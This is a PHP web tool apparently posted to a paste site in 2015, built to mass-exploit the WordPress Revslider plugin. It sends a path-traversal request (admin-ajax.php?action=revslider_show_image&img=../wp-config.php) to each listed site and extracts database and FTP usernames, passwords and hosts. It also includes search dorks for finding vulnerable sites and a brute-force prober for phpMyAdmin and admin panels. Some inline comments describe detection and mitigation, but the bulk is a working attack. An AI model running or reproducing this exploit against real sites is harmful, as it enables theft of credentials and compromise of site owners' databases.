
Revslider Exploiting by - An0x0r -

a guest
Jul 25th, 2015
  1. <?
  2.  
  3. echo"
  4.  
  5. <body bgcolor='#000000' text='white'>
  6.  
  7. <title>Revslider Exl0it1ng [ An0x0r ]</title>
  8.  
  9. <style>
  10.  
  11. body,table{background: black; }
  12.  
  13. A:link {text-decoration: none;color: red;}
  14.  
  15. A:active {text-decoration: none;color: red;}
  16.  
  17. A:visited {text-decoration: none;color: red;}
  18.  
  19. A:hover {text-decoration: underline; color: red;}
  20.  
  21. #new,input,textarea,table,td,tr,#gg
  22.  
  23. {
  24.  
  25. border-style:solid;
  26.  
  27. text-decoration:bold;
  28.  
  29. }
  30.  
  31. input:hover,tr:hover,td:hover,textarea:hover
  32.  
  33. {
  34.  
  35. background-color: #FFFFCC;
  36.  
  37. color:green;
  38.  
  39. size:10px;
  40.  
  41. }
  42.  
  43. </style>
  44.  
  45. <center><img src='http://im72.gulfup.com/zwchBZ.png' height='250' width='295'></img><br>
  46.  
  47. <!--- Menu -----!--->
  48.  
  49. <p align='center' dir='ltr'>
  50.  
  51. <font face='Verdana' size='2' color='#FFFFFF'>#
  52.  
  53. <a href='?ma=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
  54.  
  55. <a href='?ma=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
  56.  
  57. <font face='Verdana' size='2' color='#006699'>
  58.  
  59. <a href='?ma=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
  60.  
  61. <font face='Verdana' size='2' color='#006699'>
  62.  
  63. <a href='?ma=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71. <font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
  72.  
  73. <font face='Verdana' size='2' color='#006699'>
  74.  
  75. <a href='?ma=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83. <font face='Verdana' size='2' color='#FFFFFF'> # </font>
  84.  
  85. <br><br>
  86.  
  87. ";
  88.  
  89.  
  90.  
  91.  
  92.  
  93. /////////////////////////////////
  94.  
  95. if ($_GET['ma'] == 'exp') {
      // Branch for ?ma=exp: renders a form with a textarea of target base URLs and,
      // on POST, requests one fixed URL per target and pattern-matches the response.
  96.  
  97. echo"<form method='post'>
  98.  
  99. <textarea name='sites' cols='50' rows='12'></textarea><br>
  100.  
  101. <input type='submit' name='go' value='Exploit'>
  102.  
  103. </form>";
  104.  
      // findit(): returns the part of $mytext between the first case-insensitive
      // occurrence of $starttag and the next occurrence of $endtag.
      // Neither stripos() result is checked for false.
  105. function findit($mytext,$starttag,$endtag) {
  106.  
  107. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
  108.  
  109. $posRight = stripos($mytext,$endtag,$posLeft+1);
  110.  
  111. return substr($mytext,$posLeft,$posRight-$posLeft);
  112.  
  113. }
  114.  
      // Error output is silenced and the execution time limit is removed for this request.
  115. error_reporting(0);
  116.  
  117. set_time_limit(0);
  118.  
  119. $ya=$_POST['go'];
  120.  
  121. $co=$_POST['sites'];
  122.  
  123.  
  124.  
  125. if($ya){
  126.  
      // One target per CRLF-separated line of the submitted textarea.
  127. $e=explode("\r\n",$co);
  128.  
  129. foreach($e as $bda){
  130.  
  131. //echo '<br>'.$bda;
  132.  
  133. /// you can devlope the tool ///
  134.  
      // The request goes to the revslider_show_image AJAX action with
      // img=../wp-config.php, a relative path that steps up one directory.
      // Detection: this query string against /wp-admin/admin-ajax.php in web-server
      // access logs marks a probe; a response body containing DB_HOST means the
      // WordPress configuration file was disclosed.
      // Mitigation after disclosure: update the plugin, then rotate the database and
      // FTP credentials and the auth keys/salts stored in wp-config.php.
  135. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  136.  
  137. $dn=($bda).($linkof);
  138.  
  139. $file=@file_get_contents($dn);
  140.  
      // A response counts as a hit when it contains DB_HOST; the FTP_USER test only
      // selects which set of constants is printed. "Infected" in the output therefore
      // means "returned its wp-config.php", not that malware was found on the host.
  141. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  142.  
  143. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
  144.  
  145. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  146.  
  147. echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  148.  
  149. echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  150.  
  151. echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  152.  
  153. echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  154.  
  155. }
  156.  
      // Response contains both DB_HOST and FTP_USER: only the FTP_* constants are printed.
  157. elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  158.  
  159. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  160.  
  161. echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
  162.  
  163. echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  164.  
  165. echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  166.  
  167. echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  168.  
  169. echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  170.  
  171. }
  172.  
      // No DB_HOST in the response (including a failed fetch): reported as not affected.
  173. else{
  174.  
  175. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  176.  
  177. echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
  178.  
  179. echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
  180.  
  181. }
  182.  
  183.  
  184.  
  185. }
  186.  
  187. }
  188.  
  189. /////////////////////////////////////
  190.  
  191.  
  192.  
  193. /////////////////////////////////////
  194.  
  195. if ($_GET['ma'] == 'dorks') {
      // Branch for ?ma=dorks: prints a static textarea of search-engine queries keyed
      // on the plugin's directory and file names; nothing is requested or computed.
      // The intitle:"Index Of..." entries match open directory listings, so a site
      // that appears under them has directory indexing enabled on those paths.
  196.  
  197. echo'<br><textarea cols=50 rows=12 >
  198.  
  199. inurl:wp-content/plugins/revslider/
  200.  
  201. inurl:revslider
  202.  
  203. inurl:revslider_admin.php
  204.  
  205. inurl:revslider_front.php
  206.  
  207. inurl:plugins/revslider/
  208.  
  209. intext:Powered by Revslider
  210.  
  211. intitle:"Index Of/ revslider"
  212.  
  213. intitle:"Index Of/wp-content/themes/revslider"
  214.  
  215. intitle:"Index Of/wp-content/plugins/revslider"
  216.  
  217. intitle:"Index Of/admin/revslider"
  218.  
  219. intitle:"Index Of/fr/revslider"
  220.  
  221. intitle:"Index Of/en/revslider"
  222.  
  223. intitle:"Index Of/us/revslider"
  224.  
  225. intitle:"Index Of/ar/revslider"
  226.  
  227. intitle:"Index Of/es/revslider"
  228.  
  229. intitle:"Index Of/de/revslider"
  230.  
  231. </textarea>';
  232.  
  233.  
  234.  
  235. }
  236.  
  237. //////////////////////////////////////
  238.  
  239.  
  240.  
  241. //////////////////////////////////////
  242.  
  243. if ($_GET['ma'] == 'toip') {
      // Branch for ?ma=toip: renders a form, then resolves each submitted hostname
      // and prints "name ==> address".
  244.  
  245. echo"
  246.  
  247. <form method='post' ><center>
  248.  
  249. <textarea cols='50' rows='12' name='site2ip' >www.example.com
  250.  
  251. Please Romove http:// or https://</textarea></br><br>
  252.  
  253. <input type='submit' name='w2ip' value='Extract' ><br>
  254.  
  255. </center>";
  256.  
  257. if(isset($_POST['site2ip'])){
  258.  
      // One hostname per line; each is trimmed before lookup.
  259. foreach(explode("\n",$_POST['site2ip']) as $site4ip){
  260.  
  261. $ipp=trim($site4ip);
  262.  
      // gethostbyname() returns its argument unchanged when resolution fails, so an
      // unresolved name is printed on both sides of the arrow.
      // $ipp is written into the HTML output without escaping.
  263. echo '<font color="red" size="3"></font><font color="green" size="5"><center>
  264.  
  265. <font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
  266.  
  267. <font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
  268.  
  269. }
  270.  
  271. }
  272.  
  273. }
  274.  
  275. ////////////////////////////////////
  276.  
  277.  
  278.  
  279. ////////////////////////////////////
  280.  
  281. if ($_GET['ma'] == 'db') {
  282.  
  283.  
  284.  
  285.  
  286.  
  287. echo'
  288.  
  289. <form action ="" method="post">
  290.  
  291. <font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
  292.  
  293. <input type = "submit" value="Find" />
  294.  
  295. </form>';
  296.  
  297. $site = $_POST['site'];
  298.  
  299. $list = array(
  300.  
  301. '/phpMyAdmin/',
  302.  
  303. '/phpmyadmin/',
  304.  
  305. '/PMA/',
  306.  
  307. '/pma/',
  308.  
  309. '/admin/',
  310.  
  311. '/dbadmin/',
  312.  
  313. '/DB_ADMIN/',
  314.  
  315. '/db_admin/',
  316.  
  317. '/DBA/',
  318.  
  319. '/SQLI/',
  320.  
  321. '/dba/',
  322.  
  323. '/sqli/',
  324.  
  325. '/mysql/',
  326.  
  327. '/myadmin/',
  328.  
  329. '/phpmyadmin2/',
  330.  
  331. '/phpMyAdmin2/',
  332.  
  333. '/phpMyAdmin-2/',
  334.  
  335. '/php-my-admin/',
  336.  
  337. '/phpMyAdmin-2.2.3/',
  338.  
  339. '/phpMyAdmin-2.2.6/',
  340.  
  341. '/phpMyAdmin-2.5.1/',
  342.  
  343. '/phpMyAdmin-2.5.4/',
  344.  
  345. '/phpMyAdmin-2.5.5-rc1/',
  346.  
  347. '/phpMyAdmin-2.5.5-rc2/',
  348.  
  349. '/phpMyAdmin-2.5.5/',
  350.  
  351. '/phpMyAdmin-2.5.5-pl1/',
  352.  
  353. '/phpMyAdmin-2.5.6-rc1/',
  354.  
  355. '/phpMyAdmin-2.5.6-rc2/',
  356.  
  357. '/phpMyAdmin-2.5.6/',
  358.  
  359. '/phpMyAdmin-2.5.7/',
  360.  
  361. '/phpMyAdmin-2.5.7-pl1/',
  362.  
  363. '/phpMyAdmin-2.6.0-alpha/',
  364.  
  365. '/phpMyAdmin-2.6.0-alpha2/',
  366.  
  367. '/phpMyAdmin-2.6.0-beta1/',
  368.  
  369. '/phpMyAdmin-2.6.0-beta2/',
  370.  
  371. '/phpMyAdmin-2.6.0-rc1/',
  372.  
  373. '/phpMyAdmin-2.6.0-rc2/',
  374.  
  375. '/phpMyAdmin-2.6.0-rc3/',
  376.  
  377. '/phpMyAdmin-2.6.0/',
  378.  
  379. '/phpMyAdmin-2.6.0-pl1/',
  380.  
  381. '/phpMyAdmin-2.6.0-pl2/',
  382.  
  383. '/phpMyAdmin-2.6.0-pl3/',
  384.  
  385. '/phpMyAdmin-2.6.1-rc1/',
  386.  
  387. '/phpMyAdmin-2.6.1-rc2/',
  388.  
  389. '/phpMyAdmin-2.6.1/',
  390.  
  391. '/phpMyAdmin-2.6.1-pl1/',
  392.  
  393. '/phpMyAdmin-2.6.1-pl2/',
  394.  
  395. '/phpMyAdmin-2.6.1-pl3/',
  396.  
  397. '/phpMyAdmin-2.6.2-rc1/',
  398.  
  399. '/phpMyAdmin-2.6.2-beta1/',
  400.  
  401. '/phpMyAdmin-2.6.2-rc1/',
  402.  
  403. '/phpMyAdmin-2.6.2/',
  404.  
  405. '/phpMyAdmin-2.6.2-pl1/',
  406.  
  407. '/phpMyAdmin-2.6.3/',
  408.  
  409. '/phpMyAdmin-2.6.3-rc1/',
  410.  
  411. '/phpMyAdmin-2.6.3/',
  412.  
  413. '/phpMyAdmin-2.6.3-pl1/',
  414.  
  415. '/phpMyAdmin-2.6.4-rc1/',
  416.  
  417. '/phpMyAdmin-2.6.4-pl1/',
  418.  
  419. '/phpMyAdmin-2.6.4-pl2/',
  420.  
  421. '/phpMyAdmin-2.6.4-pl3/',
  422.  
  423. '/phpMyAdmin-2.6.4-pl4/',
  424.  
  425. '/phpMyAdmin-2.6.4/',
  426.  
  427. '/phpMyAdmin-2.7.0-beta1/',
  428.  
  429. '/phpMyAdmin-2.7.0-rc1/',
  430.  
  431. '/phpMyAdmin-2.7.0-pl1/',
  432.  
  433. '/phpMyAdmin-2.7.0-pl2/',
  434.  
  435. '/phpMyAdmin-2.7.0/',
  436.  
  437. '/phpMyAdmin-2.8.0-beta1/',
  438.  
  439. '/phpMyAdmin-2.8.0-rc1/',
  440.  
  441. '/phpMyAdmin-2.8.0-rc2/',
  442.  
  443. '/phpMyAdmin-2.8.0/',
  444.  
  445. '/phpMyAdmin-2.8.0.1/',
  446.  
  447. '/phpMyAdmin-2.8.0.2/',
  448.  
  449. '/phpMyAdmin-2.8.0.3/',
  450.  
  451. '/phpMyAdmin-2.8.0.4/',
  452.  
  453. '/phpMyAdmin-2.8.1-rc1/',
  454.  
  455. '/phpMyAdmin-2.8.1/',
  456.  
  457. '/phpMyAdmin-2.8.2/',
  458.  
  459. '/sqlmanager/',
  460.  
  461. '/mysqlmanager/',
  462.  
  463. '/p/m/a/',
  464.  
  465. '/PMA2005/',
  466.  
  467. '/pma2005/',
  468.  
  469. '/dev/',
  470.  
  471. '/phpmanager/',
  472.  
  473. '/php-myadmin/',
  474.  
  475. '/phpmy-admin/',
  476.  
  477. '/webadmin/',
  478.  
  479. '/sqlweb/',
  480.  
  481. '/websql/',
  482.  
  483. '/webdb/',
  484.  
  485. '/mysqladmin/',
  486.  
  487. '/mysql-admin/',
  488.  
  489. '/mya/',
  490.  
  491. '/PhpMyAdmin/',
  492.  
  493. '/phpmyadmin/',
  494.  
  495. '/myadmin/',
  496.  
  497. '/mysql/',
  498.  
  499. '/sql/',
  500.  
  501. '/server/',
  502.  
  503. '/db/',
  504.  
  505. '/database/',
  506.  
  507. '/databases/',
  508.  
  509. '/adm/',
  510.  
  511. '/configuration/',
  512.  
  513. '/configure/',
  514.  
  515. '/administrator/',
  516.  
  517. '/login/',
  518.  
  519. '/moderator/',
  520.  
  521. '/controlpanel/',
  522.  
  523. '/adminpanel/',
  524.  
  525. '/admincontrol/',
  526.  
  527. '/fileadmin/',
  528.  
  529. '/data/',
  530.  
  531. '/postgresql/',
  532.  
  533. '/oracle/',
  534.  
  535. '/msssql/',
  536.  
  537. '/msaccess/',
  538.  
  539. '/sysadmin/',
  540.  
  541. '/serverdata/',
  542.  
  543. '/webadmin/',
  544.  
  545. '/admins/',
  546.  
  547. '/Database_Administration/',
  548.  
  549. '/WebAdmin/',
  550.  
  551. '/useradmin/',
  552.  
  553. '/sysadmins/',
  554.  
  555. '/admin1/',
  556.  
  557. '/system-administration/',
  558.  
  559. '/administrators/',
  560.  
  561. '/pgadmin/',
  562.  
  563. '/directadmin/',
  564.  
  565. '/staradmin/',
  566.  
  567. '/ServerAdministrator/',
  568.  
  569. '/SysAdmin/',
  570.  
  571. '/administer/',
  572.  
  573. '/LiveUser_Admin/',
  574.  
  575. '/sys-admin/',
  576.  
  577. '/typo3/',
  578.  
  579. '/panel/',
  580.  
  581. '/xlogin/',
  582.  
  583. '/smblogin/',
  584.  
  585. '/phpldapadmin/',
  586.  
  587. '/server_admin/',
  588.  
  589. '/database_administration/',
  590.  
  591. '/system_administration/',
  592.  
  593. '/ss_vms_admin_sm/',
  594.  
  595. '/adminarea/',
  596.  
  597. '/MySQL/',
  598.  
  599. '/mysql_admin/',
  600.  
  601. '/server_data/',
  602.  
  603. '/DB/',
  604.  
  605. '/DB1/',
  606.  
  607. '/DB2/',
  608.  
  609. '/DB3/',
  610.  
  611. '/DB4/',
  612.  
  613. '/DB5/',
  614.  
  615. '/DB6/',
  616.  
  617. '/DB7/',
  618.  
  619. '/DB8/',
  620.  
  621. '/DB9/',
  622.  
  623. '/DB0/',
  624.  
  625. '/db1/',
  626.  
  627. '/db2/',
  628.  
  629. '/db3/',
  630.  
  631. '/db4/',
  632.  
  633. '/db5/',
  634.  
  635. '/db6/',
  636.  
  637. '/db7/',
  638.  
  639. '/db8/',
  640.  
  641. '/db9/',
  642.  
  643. '/db0/',
  644.  
  645. '/mysql5/',
  646.  
  647. '/mysql4/',
  648.  
  649. '/root/',
  650.  
  651. '/apache/',
  652.  
  653. '/php/',
  654.  
  655. '/Apache/',
  656.  
  657. '/Php/',
  658.  
  659. '/apach/',
  660.  
  661. '/apachepanel/',
  662.  
  663. '/WEBSERVERS/',
  664.  
  665. '/DATABASE1/',
  666.  
  667. '/DATABASE2/',
  668.  
  669. '/DATABASE3/',
  670.  
  671. '/DATABASE4/',
  672.  
  673. '/DATABASE5/',
  674.  
  675. '/DATABASE6/',
  676.  
  677. '/DATABASE7/',
  678.  
  679. '/DATABASE8/',
  680.  
  681. '/DATABASE9/',
  682.  
  683. '/WEBDATA/',
  684.  
  685. '/WEB_DATA/',
  686.  
  687. '/webservers/',
  688.  
  689. '/database1/',
  690.  
  691. '/database2/',
  692.  
  693. '/database3/',
  694.  
  695. '/database4/',
  696.  
  697. '/database5/',
  698.  
  699. '/database6/',
  700.  
  701. '/database7/',
  702.  
  703. '/database8/',
  704.  
  705. '/database9/',
  706.  
  707. '/webdata/',
  708.  
  709. '/web_data/',
  710.  
  711. );
  712.  
  713.  
  714.  
  715. if(isset($site)){
      // Runs only when the 'site' POST field was submitted. For every entry of $list
      // it fetches $site.$test with cURL and classifies the reply by status text.
      // Seen from the target, this is a burst of requests for admin and database-panel
      // paths from one client in list order, presumably mostly 404s on a host without
      // such panels; that pattern is a candidate for rate-limit or WAF rules.
  716.  
  717.  
  718.  
      // $path is the numeric array index and is not used; $test is the path string.
  719. foreach($list as $path => $test) {
  720.  
  721. $ch = curl_init();
  722.  
      // RETURNTRANSFER returns the response as a string; HEADER includes the response
      // headers in that string, which is what the status matching below relies on.
  723. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  724.  
  725. curl_setopt($ch, CURLOPT_HEADER, 1);
  726.  
  727. curl_setopt($ch, CURLOPT_URL, $site.$test);
  728.  
  729. $result = curl_exec($ch);
  730.  
  731. curl_close($ch);
  732.  
  733. //print $url;
  734.  
      // The match is made anywhere in headers plus body, not only on the status line.
  735. if (preg_match("/200 OK/", $result)){
  736.  
  737. echo "<b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
  738.  
  739. }
  740.  
      // Both echo statements below sit inside the 401 branch, so a 401 prints the
      // "Found" line and the "Nothing found" line; any other status prints nothing.
  741. else if (preg_match("/401 Unauthorized/", $result)) {
  742.  
  743. echo "<b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
  744.  
  745. echo "<b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
  746.  
  747. }
  748.  
  749. }
  750.  
  751. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
  752.  
  753. }
  754.  
  755.  
  756.  
  757.  
  758.  
  759. }
  760.  
  761. ////////////////////////////////////
  762.  
  763.  
  764.  
  765.  
  766.  
  767.  
  768.  
  769.  
  770.  
  771.  
  772.  
  773. if ($_GET['MA'] == 'scan') {
      // This test reads the key 'MA' (upper case), while the page's menu link is
      // ?ma=scan and every other branch reads 'ma'. PHP array keys are case-sensitive,
      // so the menu link does not reach this branch.
      // The branch only prints a placeholder message; no scanner is implemented here.
  774.  
  775.  
  776.  
  777. echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://an0x0r1@gmail.com >an0x0r1@gmail.com </a> ....</font></u></b>";
  778.  
  779. }
  780.  
  781.  
  782.  
  783.  
  784.  
  785.  
  786.  
  787.  
  788.  
  789. ?>
  790.  
  791.  
  792.  
  793.  
  794.  
  795.  
  796.  
  797. <center>
  798.  
  799. <code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
  800.  
  801. <font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By An0x0r</font></code>
  802.  
  803. </center>